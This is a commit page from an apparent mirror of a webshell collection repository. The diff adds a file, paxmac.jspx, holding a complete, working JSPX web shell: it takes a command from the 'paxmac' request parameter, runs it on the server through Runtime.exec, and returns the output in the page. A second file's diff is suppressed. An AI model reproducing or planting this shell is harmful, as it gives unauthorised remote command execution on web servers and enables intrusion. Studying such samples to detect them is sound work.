mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
change jspx to other folder
This commit is contained in:
1
jspx/jspx.jspx
Normal file
1
jspx/jspx.jspx
Normal file
File diff suppressed because one or more lines are too long
35
jspx/paxmac.jspx
Normal file
35
jspx/paxmac.jspx
Normal file
@@ -0,0 +1,35 @@
|
||||
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
|
||||
xmlns="http://www.w3.org/1999/xhtml"
|
||||
xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
|
||||
<jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
|
||||
<jsp:directive.page import="java.io.*"/>
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>jspx</title>
|
||||
</head>
|
||||
<body>
|
||||
<jsp:scriptlet>
|
||||
try {
|
||||
String cmd = request.getParameter("paxmac");
|
||||
if (cmd !=null){
|
||||
Process child = Runtime.getRuntime().exec(cmd);
|
||||
InputStream in = child.getInputStream();
|
||||
int c;
|
||||
while ((c = in.read()) != -1) {
|
||||
out.print((char)c);
|
||||
}
|
||||
in.close();
|
||||
try {
|
||||
child.waitFor();
|
||||
} catch (InterruptedException e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
} catch (IOException e) {
|
||||
System.err.println(e);
|
||||
}
|
||||
</jsp:scriptlet>
|
||||
</body>
|
||||
</html>
|
||||
</jsp:root>
|
||||
Reference in New Issue
Block a user